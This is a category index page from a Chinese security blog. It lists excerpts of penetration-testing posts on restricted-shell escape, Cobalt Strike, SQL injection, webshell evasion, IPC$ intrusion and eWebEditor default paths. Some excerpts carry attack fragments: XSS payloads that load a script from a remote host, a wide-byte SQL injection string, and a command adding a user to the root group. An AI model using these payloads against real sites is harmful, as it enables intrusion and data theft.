基础知识 - 随笔分类 - -Zad-

渗透技巧——如何逃逸Linux的受限制shell执行任意命令

摘要：导语：本文介绍了如何在受限制的shell中执行任意命令，实现交互。其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时，由于当前shell的限制，很多命令不能执行，导致后续的渗透无法进行，在这篇文章中，就介绍了一些常见的绕过方法，同时在文章末尾提供了一个线上的练习环境。 0x0 阅读全文

posted @ 2020-01-31 17:58 -Zad- 阅读(2319) 评论(0) 推荐(1)

windows信息收集

摘要：导语：介绍特权升级总是被归结为适当的枚举。但要完成适当的枚举，你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务，但过了一段时间，你就开始过滤哪些是正常的东西，而哪些不是正常的东西。最终变得更容易，因为你知道要寻找什么了，而不是挖掘希望在阅读全文

posted @ 2019-11-13 10:51 -Zad- 阅读(421) 评论(0) 推荐(0)

Ubuntu-16.04下Docker通过阿里云镜像安装（apt-get）

摘要：由于通过官方路径安装docker时总是连接不上，所以从网上找了半天，通过阿里云镜像安装docker，我的Linux是ubuntu-16.04 一、配置源里的阿里云镜像仓库 sudo vim /etc/apt/sources.list 添加以下仓库 deb http://mirrors.aliyun. 阅读全文

posted @ 2019-11-10 18:22 -Zad- 阅读(1833) 评论(0) 推荐(0)

cobaltstrike的使用

摘要：0x01 介绍 Cobalt Strike是一款渗透测试神器，常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。 Cobalt Strike集成了端口转发、扫描多模式端口Lis 阅读全文

posted @ 2019-11-03 23:06 -Zad- 阅读(754) 评论(0) 推荐(0)

如何判断网站和数据库是否站库分离

摘要：判断网站和数据库是否站库分离今天来讲是利用sql注入点来判断在注入点后加上： admin一定要是存在的表段，如果返回正常，说明网站和数据库是在同一服务器，如果不正常则说明是站库分离的阅读全文

posted @ 2019-10-24 09:13 -Zad- 阅读(1861) 评论(0) 推荐(0)

MYSQL基础常见常用语句200条

摘要：数据库 # 查看所有的数据库 SHOW DATABASES ; # 创建一个数据库 CREATE DATABASE k; # 删除一个数据库 DROP DATABASE k; # 使用这个数据库 USE k; 表 # 查看所有的表 SHOW TABLES ; # 创建一个表 CREATE TABLE 阅读全文

posted @ 2019-10-12 08:49 -Zad- 阅读(450) 评论(0) 推荐(0)

mssql 2005安装

摘要：SQL Server 2005详细安装过程及配置说明：个人感觉SQL Server 2005是目前所有的SQL Server版本当中最好用的一个版本了，原因就是这个版本比起其它版本来说要安装简单，操作简便，只可惜这个版本只能在Windows7或者低版本的操作系统里面正常安装和使用，在Windows 阅读全文

posted @ 2019-10-09 21:36 -Zad- 阅读(557) 评论(0) 推荐(0)

IPC$入侵

摘要：一唠叨一下：网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 二什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它阅读全文

posted @ 2019-09-19 09:40 -Zad- 阅读(863) 评论(0) 推荐(0)

sqlmap 详解

摘要：sqlmap 使用总结 0x01 需要了解当给 sqlmap 这么一个 url 的时候，它会：1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择，读取哪些数据 sqlmap 支持五种不同的注入模式：1、基于布尔的盲注，即可以根据返回页面判断条件阅读全文

posted @ 2019-08-08 16:11 -Zad- 阅读(735) 评论(0) 推荐(0)

全方位构造免杀 webshell 小结[一]

摘要：转载自https://klionsec.github.io/2017/10/11/bypasswaf-for-webshell/ 全方位构造免杀 webshell 小结[一] 前言: 本文几乎涵盖了市面上所有已知的webshell免杀手段,自己也很清楚,有些东西一旦公布出去,基本就活不太久了,但好在阅读全文

posted @ 2019-07-28 17:52 -Zad- 阅读(811) 评论(0) 推荐(0)

基础命令使用[win篇]

摘要：基础命令使用 [ win篇 ] 2017-11-05 WIN CMD 0x01 基础命令使用: 演示环境: 1 2 win2008R2cn ip: 192.168.3.23 假设为入侵者机器 win2012R2cn ip: 192.168.3.122 假设为目标机器 1 2 3 4 5 6 # wh 阅读全文

posted @ 2019-07-28 17:41 -Zad- 阅读(309) 评论(0) 推荐(0)

宽字节注入

摘要：首先前期是数据库的编码是gbk，，前提前提!!!!!!!!!!!!!! 当我们提交是"id=1' and 1=1#时，MySQL执行的语句是id='1\' and 1=1#' 很明显这是没有注入成功的，单引号并没有闭合，但是当我们提交的是 id=1%df' and 1=1# MySQL执行的语句就阅读全文

posted @ 2019-07-27 16:25 -Zad- 阅读(164) 评论(0) 推荐(0)

sql 手注语法

摘要：mysql中的information_schema 结构用来存储数据库系统信息 information_schema 结构中这几个表存储的信息，在注射中可以用到的几个表。 | SCHEMATA ――>存储数据库名的， |——>关键字段：SCHEMA_NAME，表示数据库名称 | TABLES ――> 阅读全文

posted @ 2019-07-24 13:42 -Zad- 阅读(545) 评论(0) 推荐(0)

linux下新建用户

摘要：新建用户的两种方式：一步步创建 useradd -m user1 #-m 是建立家目录 passwd user1 #设置密码 usermod -a -G root user1 #加入管理员 chsh -s /bin/bash user1 #登陆后使用bash 一句话建立用户 useradd -m 阅读全文

posted @ 2019-07-22 15:24 -Zad- 阅读(1925) 评论(0) 推荐(0)

XSS脚本汇总

摘要：(1)普通的XSS JavaScript注入<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号< 阅读全文

posted @ 2019-07-21 22:19 -Zad- 阅读(4517) 评论(0) 推荐(0)

ewebeditor 路径

摘要：1、关键文件的名称和路径Admin_Login.asp 登录页面Admin_Default.asp 管理首页Admin_Style.aspAdmin_UploadFile.aspUpload.aspAdmin_ModiPwd.aspeWebEditor.aspdb/ewebeditor.mdb 默认阅读全文

posted @ 2019-07-21 22:17 -Zad- 阅读(895) 评论(0) 推荐(0)

常见的端口及对应的漏洞

摘要：mysql 的默认端口是3306，SQL server默认端口号为：1433oracle 默认端口号为：1521DB2 默认端口号为：5000PostgreSQL 默认端口号为：5432 sysbase数据库默认端口：服务端口5000；监听端口4100；备份端口：4200 pointbase 默认阅读全文

posted @ 2019-07-16 21:49 -Zad- 阅读(3172) 评论(0) 推荐(0)

Zad

随笔分类 - 基础知识

公告